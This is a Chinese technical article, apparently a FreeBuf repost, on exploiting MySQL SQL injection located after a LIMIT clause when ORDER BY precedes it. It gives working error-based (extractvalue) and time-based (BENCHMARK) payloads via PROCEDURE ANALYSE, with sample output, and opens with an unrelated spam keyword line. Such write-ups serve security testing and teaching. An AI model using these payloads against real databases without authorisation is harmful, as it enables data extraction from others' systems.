自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

Mysql注入點(diǎn)在limit關(guān)鍵字后面的利用方法

作者:Conermx
安全 數(shù)據(jù)安全
描寫sql注入利用方法的文章數(shù)不勝數(shù),本文將描述一種比較特殊的場景。

描寫sql注入利用方法的文章數(shù)不勝數(shù),本文將描述一種比較特殊的場景。

Mysql注入點(diǎn)在limit關(guān)鍵字后面的利用方法

細(xì)節(jié)

在一次測試中,我碰到了一個(gè)sql注入的問題,在網(wǎng)上沒有搜到解決辦法,當(dāng)時(shí)的注入點(diǎn)是在limit關(guān)鍵字后面,數(shù)據(jù)庫是MySQL5.x,SQL語句類似下面這樣:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入點(diǎn)】

問題的關(guān)鍵在于,語句中有order by 關(guān)鍵字,我們知道,mysql 中在order by 前面可以使用union 關(guān)鍵字,所以如果注入點(diǎn)前面沒有order by 關(guān)鍵字,就可以順利的使用union 關(guān)鍵字,但是現(xiàn)在的情況是,注入點(diǎn)前面有order by 關(guān)鍵字,這個(gè)問題在stackoverflow 上和sla.ckers上都有討論,但是都沒有什么有效的解決辦法。

我們先看看 mysql 5.x 的文檔中的 select 的語法:

  1. SELECT 
  2. [ALL | DISTINCT | DISTINCTROW ]  
  3. [HIGH_PRIORITY]  
  4. [STRAIGHT_JOIN]  
  5. [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]  
  6. [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]  
  7. select_expr [, select_expr ...]  
  8. [FROM table_references  
  9. [WHERE where_condition]  
  10. [GROUP BY {col_name | expr | position}  
  11. [ASC | DESC], ... [WITH ROLLUP]]  
  12. [HAVING where_condition]  
  13. [ORDER BY {col_name | expr | position}  
  14. [ASC | DESC], ...]  
  15. [LIMIT {[offset,] row_count | row_count OFFSET offset}]  
  16. [PROCEDURE procedure_name(argument_list)]  
  17. [INTO OUTFILE 'file_name' export_options  
  18. INTO DUMPFILE 'file_name' 
  19. INTO var_name [, var_name]]  
  20. [FOR UPDATE | LOCK IN SHARE MODE]]  

limit 關(guān)鍵字后面還有 PROCEDURE 和 INTO 關(guān)鍵字,into 關(guān)鍵字可以用來寫文件,但這在本文中不重要,這里的重點(diǎn)是 PROCEDURE 關(guān)鍵字.MySQL默認(rèn)可用的存儲過程只有 ANALYSE (doc)。

嘗試用這個(gè)存儲過程:

  1. mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);  
  2. ERROR 1386 (HY000): Can't use ORDER clause with this procedure 
  3.  

ANALYSE支持兩個(gè)參數(shù),試試兩個(gè)參數(shù):

  1. mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);  
  2. ERROR 1386 (HY000): Can't use ORDER clause with this procedure 
  3.  

依然無效,嘗試在 ANALYSE 中插入 sql 語句:

  1. mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);  

響應(yīng)如下:

  1. ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse’ 

事實(shí)證明,sleep 沒有被執(zhí)行,最終,我嘗試了如下payload :

  1. mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);  
  2. ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1' 
  3.  

啊哈,上面的方法就是常見的報(bào)錯(cuò)注入,所以,如果注入點(diǎn)支持報(bào)錯(cuò),那所有問題都o(jì)k,但是如果注入點(diǎn)不是報(bào)錯(cuò)的,還可以使用 time-based 的注入,payload 如下:

  1. SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)  

有意思的是,這里不能用sleep而只能用 BENCHMARK。

另外,這里還有一種類似的方法 https://rdot.org/forum/showpost.php?p=36186&postcount=30

責(zé)任編輯:藍(lán)雨淚 來源: FreeBuf
Mysql注入sql注入
相關(guān)推薦

2011-08-24 17:23:10

2010-11-26 15:38:32

MySQL注入

2010-10-13 16:31:18

優(yōu)化MySQL查詢

2010-02-05 15:51:06

C++ explici

2022-10-26 11:00:06

VisualC++函數(shù)

2011-06-27 16:50:35

關(guān)鍵詞

2009-09-01 15:25:04

C# default關(guān)

2011-05-27 15:00:12

網(wǎng)站優(yōu)化關(guān)鍵字

2010-06-13 09:34:22

MySQL數(shù)據(jù)庫

2009-06-29 18:26:11

Java多線程Synchronize同步類

2024-02-23 19:11:13

C++編程開發(fā)

2009-08-21 14:58:56

C# this關(guān)鍵字

2013-01-30 10:12:14

Pythonyield

2018-04-20 15:56:09

Pythonglobal關(guān)鍵字

2009-09-02 09:24:03

C# this關(guān)鍵字

2009-09-17 09:30:00

Linq LET關(guān)鍵字

2012-03-01 12:50:03

Java

2022-01-04 16:35:42

C++Protected關(guān)鍵字

2010-10-08 15:37:21

MySQL單表

2020-08-10 07:52:30

MySQL數(shù)據(jù)庫
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號